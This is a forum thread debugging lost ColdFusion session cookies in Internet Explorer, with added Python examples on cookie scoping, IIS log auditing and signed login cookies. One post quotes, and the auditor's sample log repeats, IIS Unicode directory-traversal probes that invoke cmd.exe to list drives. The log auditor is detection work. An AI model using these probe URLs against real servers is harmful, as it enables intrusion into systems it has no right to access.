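CJ's suggestion and the change above both give the CFID/CFTOKEN cookies explicit domain= and path= attributes. The rules a browser applies when it decides which cookies to attach to a request are worth seeing in code, so here is an added example (Python, not part of the thread and not ColdFusion code) of the RFC 6265 defaults: a Set-Cookie with no Path= is scoped to the directory of the URL that set it, and a Set-Cookie with no Domain= is sent only to the exact host that set it. Because Application.cfm runs on every request, including ones under /_PM/time/, the demo sets one cookie each way from such a URL. The host names are constructed, and whether a given server tag emits Path= on its own is something to confirm in the actual response headers rather than assume.

```python
"""Browser-side cookie scoping (RFC 6265) for the CFID/CFTOKEN cookies:
what changes when a Set-Cookie carries explicit Domain= and Path= attributes.
Added example, not part of the thread; the host names are constructed."""
from urllib.parse import urlsplit


def default_path(request_path):
    """RFC 6265 5.1.4: with no Path= attribute a cookie is scoped to the
    directory of the URL that set it, not to the whole site."""
    if not request_path.startswith("/") or request_path.count("/") == 1:
        return "/"
    return request_path[:request_path.rfind("/")]


def path_matches(cookie_path, request_path):
    """RFC 6265 5.1.4 path-match."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    if cookie_path.endswith("/"):
        return True
    return request_path[len(cookie_path)] == "/"


def domain_matches(cookie_domain, host, host_only):
    """A cookie set without Domain= is host-only (exact host); one set with
    Domain= is also sent to subdomains. A leading dot is ignored."""
    cookie_domain, host = cookie_domain.lstrip(".").lower(), host.lower()
    if host_only:
        return host == cookie_domain
    return host == cookie_domain or host.endswith("." + cookie_domain)


def set_cookie(jar, name, value, set_on_url, domain=None, path=None):
    """Store a Set-Cookie received in the response to set_on_url, filling in
    the defaults a browser applies when Domain= or Path= is absent."""
    url = urlsplit(set_on_url)
    jar.append({
        "name": name,
        "value": value,
        "domain": (domain or url.hostname).lstrip(".").lower(),
        "host_only": domain is None,
        "path": path or default_path(url.path or "/"),
    })


def cookies_for(jar, request_url):
    """Names of the jar's cookies a browser would attach to request_url."""
    url = urlsplit(request_url)
    return sorted(c["name"] for c in jar
                  if domain_matches(c["domain"], url.hostname, c["host_only"])
                  and path_matches(c["path"], url.path or "/"))


def demo():
    """Two cookies set by the same response under /_PM/time/: CFID with no
    attributes at all, CFTOKEN with the explicit domain= and path= values
    like the ones added to Application.cfm. Constructed host names."""
    setter = "http://app.example.test/_PM/time/time_clock_out_confirm.cfm"
    jar = []
    set_cookie(jar, "CFID", "191", setter)   # host-only, path defaults to /_PM/time
    set_cookie(jar, "CFTOKEN", "83813765", setter, domain=".example.test", path="/")
    return {
        "same directory": cookies_for(jar, "http://app.example.test/_PM/time/clock_in.cfm"),
        "site root": cookies_for(jar, "http://app.example.test/central_station.cfm"),
        "other host": cookies_for(jar, "http://other.example.test/central_station.cfm"),
    }


if __name__ == "__main__":
    for where, names in demo().items():
        print(f"{where}: {names}")
```

The demo shows the practical consequence: the cookie set without Path= is returned for templates in the same directory but not for /central_station.cfm, while the one set with path="/" and a Domain= attribute reaches both the site root and a sibling host. When a login cookie vanishes only on some pages, comparing the Path= and Domain= of the Set-Cookie headers against the URLs of the failing requests is the first check to make.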
ASKER
Somebody from d-11-127.dhcp-156-56.indiana.edu is trying every combination of \
[Edited by Cerebro]
http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+C:\ http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+D:\ http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+E:\ etc.
[Edited by Cerebro]
Does anyone know what this is? It looks like the UNICODE exploit for IIS 5.0/4.0 circa May 14, 2001. Probably that Mexican guy that works for Asociacion de Distribuidores Mercedes Benz, A.C. is doing it. LOL! Who knows. :-)
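The IIS log posted earlier and the probes quoted in this post both come down to reading W3C extended log lines, so here is one added example that serves both (Python, not from the thread and not ColdFusion code). It parses the #Fields directive, rebuilds the cookie jar from the cs(Cookie) field, checks that CFMAGIC agrees with CFID and CFTOKEN in the way the earlier variable dumps show it should, flags a CFID/CFTOKEN change between consecutive requests, and flags request paths that carry overlong UTF-8 or parent-directory sequences. The sample log lines are constructed to mirror the shape of the ones posted; the host name, cookie values and timestamps are made up.

```python
"""Audit IIS 5 W3C extended log lines for two things this thread is chasing:
CF session cookies that change or disagree between requests, and the
overlong-UTF-8 traversal probes seen in the server log.
Added example; the sample log is constructed, not the asker's real log."""
from urllib.parse import unquote, unquote_to_bytes

# Constructed sample in the same #Fields layout the asker posted.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-21 19:44:21
#Fields: time cs-method cs-uri-stem cs-uri-query cs(Cookie) cs(Referer)
19:44:21 GET /index.cfm - CFMAGIC=25%3A33044530;+USER_INFO=...;+CFID=39;+CFTOKEN=99788566 -
19:44:28 POST /logon.cfm - CFMAGIC=25%3A33044530;+USER_INFO=...;+CFID=39;+CFTOKEN=99788566 http://app.example.test/
19:44:49 POST /_PM/time/time_clock_out_confirm.cfm - CFMAGIC=40%3A12345678;+CFID=40;+CFTOKEN=12345678 -
19:50:02 GET /scripts/..%c0%af..%c0%af/winnt/system32/cmd.exe /c+dir+C:\\ - -
"""


def parse_w3c_log(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):          # other directives: #Software, #Date ...
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split(" ")          # IIS writes '+' for spaces inside a field
        if len(values) != len(fields):
            raise ValueError(f"expected {len(fields)} fields, got {len(values)}: {line}")
        yield dict(zip(fields, values))


def parse_cookie_field(field):
    """Rebuild the cookie jar from cs(Cookie); '-' means no Cookie header."""
    jar = {}
    if field == "-":
        return jar
    for part in field.replace("+", " ").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            jar[name.upper()] = unquote(value)
    return jar


def cfmagic_consistent(jar):
    """The dumps in this thread show CFMAGIC as '<CFID>:<CFTOKEN>' when the
    session is healthy; report whether the three cookies agree on this request."""
    if not all(k in jar for k in ("CFMAGIC", "CFID", "CFTOKEN")):
        return False
    return jar["CFMAGIC"] == f"{jar['CFID']}:{jar['CFTOKEN']}"


def has_overlong_utf8(uri):
    """Percent-decode to bytes and look for 0xC0/0xC1 lead bytes. They never
    occur in valid UTF-8 (they encode ASCII in two bytes), which is what the
    ..%c0%af.. form relies on to get a '/' past a path check."""
    return any(b in (0xC0, 0xC1) for b in unquote_to_bytes(uri))


def has_dotdot(uri):
    """Plain or percent-encoded parent-directory references."""
    data = unquote_to_bytes(uri)
    return b"../" in data or b"..\\" in data


def audit_log(text):
    """Return (record_no, finding, detail) tuples for anything worth a look."""
    findings = []
    last_session = None
    for n, rec in enumerate(parse_w3c_log(text), 1):
        stem = rec.get("cs-uri-stem", "")
        if has_overlong_utf8(stem) or has_dotdot(stem):
            findings.append((n, "traversal-probe", stem))
        jar = parse_cookie_field(rec.get("cs(Cookie)", "-"))
        if not jar:
            continue                      # no Cookie header on this request
        if not cfmagic_consistent(jar):
            findings.append((n, "cfmagic-mismatch", jar.get("CFMAGIC")))
        session = (jar.get("CFID"), jar.get("CFTOKEN"))
        if last_session is not None and session != last_session:
            findings.append((n, "session-id-changed", f"{last_session} -> {session}"))
        last_session = session
    return findings


if __name__ == "__main__":
    for record_no, kind, detail in audit_log(SAMPLE_LOG):
        print(f"record {record_no}: {kind}: {detail}")
```

Run against a real log the session checks need one more column (c-ip, or better the CFID itself) to group requests per client, since consecutive lines in a busy log belong to different visitors; the constructed sample has a single visitor so the simple "previous record" comparison is enough to show the idea. The traversal checks work on the raw cs-uri-stem on purpose: decoding first and then looking for "../" would miss exactly the overlong encodings that the probes in this post use.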
dbabbit: As per your request I have edited and removed references to an IP address or server name that may reveal to malicious users your production server's address.
If I have missed a comment/line please let me know and I will fix that.
If I can be of any other assistance please let me know.
Cerebro
Community Moderator
Experts Exchange
Any updates dbabbit?
I am curious that the change fixed in some cases but not all.
CJ
ASKER
Yes, the complicated javascript-activated form I was using for testing works now; everything else still causes a forced relogin page to come up. Nothing about this form has been changed. I'm planning on slowly removing header and form information and retesting each time to see if I can pinpoint some combination that makes this not work.
ASKER
If I View Source, copy the html to a file called bad.htm, view that in the browser, then click on the offending submits, the page behaves as it should. It's possibly something in the header, for instance something that can be changed with cfheader. I'm going to methodically remove CFML from the templates until I can cause the page to stop misbehaving.
are the cfid and cftoken still changing?
are you using cflocation anywhere?
CJ
ASKER
Well, given that .htm files don't have cfids and cftokens, I copied the HTML to another file, called bad.cfm.
Before I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above (except CGI.HTTP_REFERER) exist.
2) Cookie.CFID = 125, Cookie.CFMAGIC = 25:33044530, Cookie.CFTOKEN = 56316595, and Cookie.USER_INFO exists.
3) Session.CFID = 125, Session.CFTOKEN 56316595, and Session.USER_INFO does not exist.
4) Client.CFID = 125, Client.CFToken = 56316595, and Client.USER_INFO does not exist.
After I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above exist.
2) Cookie.CFID = 127, Cookie.CFMAGIC = 25:33044530, Cookie.CFTOKEN = 75829985, and Cookie.USER_INFO still exists.
3) Session.CFID = 127, Session.CFTOKEN 75829985, and Session.USER_INFO still does not exist.
4) Client.CFID = 127, Client.CFToken = 75829985, and Client.USER_INFO still does not exist.
ASKER
I insert a self-calling control panel whose form action is itself. When the control panel detects that its referrer was itself, it does some database action, then this:
<!--- Go back to where you came from --->
<CFLOCATION ADDTOKEN="No" URL="#CGI.HTTP_REFERER#">
ASKER
I've got the templates pared down to just the javascript-enabled form and the normal form - no <head></head>, etc.
Before I click the javascript-enabled form link or the submit button:
Cookie.CFID 191
Cookie.CFMAGIC 25:33044530
Cookie.CFTOKEN 83813765
Cookie.USER_INFO (defined)
Session.CFID 191
Session.CFTOKEN 83813765
Session.USER_INFO (not defined)
Client.CFID 191
Client.CFToken 83813765
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip, deflate
CGI.HTTP_ACCEPT_LANGUAGE en-us
CGI.HTTP_CACHE_CONTROL no-cache
CGI.HTTP_CONNECTION Keep-Alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE (blank)
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; iOpus-I-M)
After I click the javascript-enabled form link:
Cookie.CFID 191
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 83813765
Cookie.USER_INFO (not defined)
Session.CFID 191
Session.CFTOKEN 83813765
Session.USER_INFO (not defined)
Client.CFID 191
Client.CFToken 83813765
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING (blank)
CGI.HTTP_ACCEPT_LANGUAGE (blank)
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION (blank)
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-urlencoded
CGI.HTTP_COOKIE (blank)
CGI.HTTP_HOST (blank)
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT (blank)
After I click the submit button:
Cookie.CFID 192
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 70077366
Cookie.USER_INFO (not defined)
Session.CFID 192
Session.CFTOKEN 70077366
Session.USER_INFO (not defined)
Client.CFID 192
Client.CFToken 70077366
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING (blank)
CGI.HTTP_ACCEPT_LANGUAGE (blank)
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION (blank)
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-urlencoded
CGI.HTTP_COOKIE (blank)
CGI.HTTP_HOST (blank)
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT (blank)
ASKER
This is what Mozilla 1.3 (Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312) looks like. Remember, I've got the templates pared down to just the javascript-enabled form and the normal form - no <head></head>, etc.
Before I click the javascript-enabled form link or the submit button:
Cookie.CFID 195
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 30653229
Cookie.USER_INFO (defined)
Session.CFID 195
Session.CFTOKEN 30653229
Session.USER_INFO (not defined)
Client.CFID 195
Client.CFToken 30653229
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0.9
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE (blank)
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
Clicking the javascript-enabled form link works!! Here is the data:
Cookie.CFID 195
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 30653229
Cookie.USER_INFO (defined)
Session.CFID 195
Session.CFTOKEN 30653229
Session.USER_INFO (not defined)
Client.CFID 195
Client.CFToken 30653229
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0.9
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-urlencoded
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
After I (push the Back button and) click the submit button, it works again!!! Here is the data:
Cookie.CFID 196
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 33679268
Cookie.USER_INFO (defined)
Session.CFID 196
Session.CFTOKEN 33679268
Session.USER_INFO (not defined)
Client.CFID 196
Client.CFToken 33679268
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0.9
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-urlencoded
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
I don't know what to make of the fact that it works where MSIE doesn't, or the fact that the CFID has changed on the submit button but not on the javascript-enabled form link.
ASKER
The reason that the CFID does not increase when I click the javascript-enabled form link is that I am passing Session.URLToken in the URL. When I strip that out, the CFID behaves just like it does with the submit button.
ASKER
Here is the pared-down CFML:
<cfoutput><html><body>
<cfscript>
FormAction = "http://" & CGI.SERVER_NAME & CGI.SCRIPT_NAME;
FormAction = FormAction & "?" & Session.URLToken;
FormName="javascriptEnabledForm";
</cfscript>
<form
action="#FormAction#"
method="post"
name="#FormName#"
><a
href="javascript:this.document.forms['#FormName#'].submit()"
>javascript-enabled form link</a></form>
<form
action="#FormAction#"
method="post"
><input
type="submit"
value="Submit Button"
></form>
</body></html></cfoutput>
I can paste this or the HTML it displays into a different template and that template runs fine. I'm going to start work on paring down the Application.cfm.
ASKER
I really don't know how to pare down the Application.cfm: I mean, if I remove the logic that inserts the login form, of course it doesn't force a login! :-) Below are the boolean expressions within Application.cfm that determine the need to force a login.
MSIE and Mozilla before:
IsDefined('Access') Yes
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProductionServerzApplicationName') No
MSIE after (either form):
IsDefined('Access') No
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProductionServerzApplicationName') No
Mozilla after (either form):
IsDefined('Access') Yes
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProductionServerzApplicationName') No
Notice how my application name is never authenticated? If this is the wrong way to go about it, what system should I use then?
why don't you just remove the isAuthenticated part.
if the session var exists.. and that session var is created by your login app.. then they must be authenticated right?
CJ
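CJ's point holds for a session-scope variable because only the login template, running on the server, can create it. It does not hold for the User_Info cookie: Application.cfm rebuilds Access from whatever the browser sends, so the IsDefined('Access') test in the table above passes for any cookie that deserializes, whoever wrote it. The following added example (Python, not the thread's CFML; JSON stands in for WDDX and HMAC-SHA256 is a technique not mentioned in the thread) shows the usual way to keep login state in a cookie safely: sign the serialized packet with a server-only secret, and treat a cookie that fails the signature check or has expired as no login at all. The secret, user name and role are constructed values.

```python
"""Signed login cookie: an integrity-protected stand-in for the WDDX
User_Info cookie. Added example; JSON replaces WDDX and the secret is a
placeholder, not a real key."""
import base64
import binascii
import hashlib
import hmac
import json
import time

# Placeholder: a real deployment loads this from protected configuration.
SERVER_SECRET = b"constructed-secret-do-not-ship"
COOKIE_TTL = 24 * 60 * 60   # one day, like expires="1" on the original cfcookie


def b64encode_nopad(data):
    """URL-safe base64 without '=' padding, so the value is cookie-safe."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64decode_nopad(text):
    """Inverse of b64encode_nopad; raises ValueError on malformed input."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_login_cookie(access, secret=SERVER_SECRET, now=None, ttl=COOKIE_TTL):
    """Serialize the Access struct plus an expiry and append an HMAC-SHA256
    over the serialized bytes. Returns the cookie value as '<body>.<sig>'."""
    current = time.time() if now is None else now
    payload = dict(access, exp=int(current + ttl))
    body = b64encode_nopad(json.dumps(payload, sort_keys=True, separators=(",", ":")).encode())
    sig = b64encode_nopad(hmac.new(secret, body.encode("ascii"), hashlib.sha256).digest())
    return f"{body}.{sig}"


def read_login_cookie(cookie, secret=SERVER_SECRET, now=None):
    """Return the Access struct if the cookie is authentic and unexpired,
    otherwise None. This replaces the bare IsDefined('Access') test: a cookie
    the server did not sign, or that was altered after signing, yields None."""
    body, sep, sig = cookie.partition(".")
    if not sep:
        return None
    try:
        given = b64decode_nopad(sig)
    except (binascii.Error, ValueError):
        return None
    expected = hmac.new(secret, body.encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(given, expected):   # constant-time comparison
        return None
    try:
        payload = json.loads(b64decode_nopad(body))
    except (binascii.Error, ValueError):
        return None
    current = time.time() if now is None else now
    if not isinstance(payload, dict) or payload.get("exp", 0) <= current:
        return None
    payload.pop("exp")
    return payload


if __name__ == "__main__":
    cookie = make_login_cookie({"user": "alice", "role": "Supervisor"})
    print(cookie)
    print(read_login_cookie(cookie))
```

The signature covers the encoded body, so editing any field (the role, the user, the expiry) invalidates it, and the expiry inside the signed packet means the server does not depend on the browser honouring the cookie's expires attribute. This protects integrity only; the packet is readable by anyone holding the cookie, so it should carry an identifier and role, not secrets.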
ASKER
I think the key is the relocation javascript in the logon page:
<cfoutput><script
type="text/jscript"
>
window.location.href = 'http:/' + '/#CGI.SERVER_NAME##CentralStationRedirect#?#Session.URLToken#&#CreateUUID()#';
</script></cfoutput>
Is window.location.href no longer supported like it used to be? I have to actually go through the logon page and let it redirect me to another page in order to get the symptoms to appear; if I paste what seems like the offending code into another template and just show that template, I don't have the problem. If I use Mozilla, I end up having to skip over to the template in a similar manner. (This is because the window.location.href thing doesn't actually relocate you in Mozilla.)
why are you using javascript redirect rather than cflocation?
CJ
ASKER
I had problems with it in the past. What does cflocation do these days?
<cflocation url="whatever" addtoken="yes">
will redirect and add your cfid, cftoken to the url.
as long as you are not setting any cookies, cflocation is a good choice.
CJ
ASKER
Well, I AM setting cookies. The User_Info cookie. Got any other ideas?
a meta refresh?
CJ
ASKER
How about this:
<cfheader
statuscode="302"
statustext="Object Temporarily Moved"
>
<cfheader
name="location"
value="http://#CGI.SERVER_NAME##CentralStationRedirect#?#Session.URLToken#&#CreateUUID()#"
>
add that inside a cfif right?
CJ
ASKER
Right. A complex set of cfcases and cfifs. It doesn't seem to help, though. At least the forms without Session.URLToken in the URL still don't work.
ASKER CERTIFIED SOLUTION
ASKER
I'm changing all <cflocation to <cf_location and all AddToken="No" to AddToken="Yes" and checking location.href on a case by case basis. I also probably need to go through each of the 580 or so forms in the app and add Session.URLToken to the URL. <cf_location was written by Christopher Bradford and just puts those two <cfheaders in place.
ah ok.. keep us posted.
CJ
ASKER
Others have confirmed that IE 6.1 sp1 is not respecting the area of memory that Macromedia uses to store its cookie data. Adding the session info to the URL, etc. helps a little.
A C? I would have rather you asked to PAQ this question than award it to me with a C. :-(
CJ
ASKER
OOPS! That was a mistake! How do I fix that?
I can get a moderator to fix that.
What do you want to change it to?
CJ
ASKER
A
Grade changed as per requested.
Cerebro
EE Mod
Thanx Cerebro and thank you dbabbit.
CJ
ASKER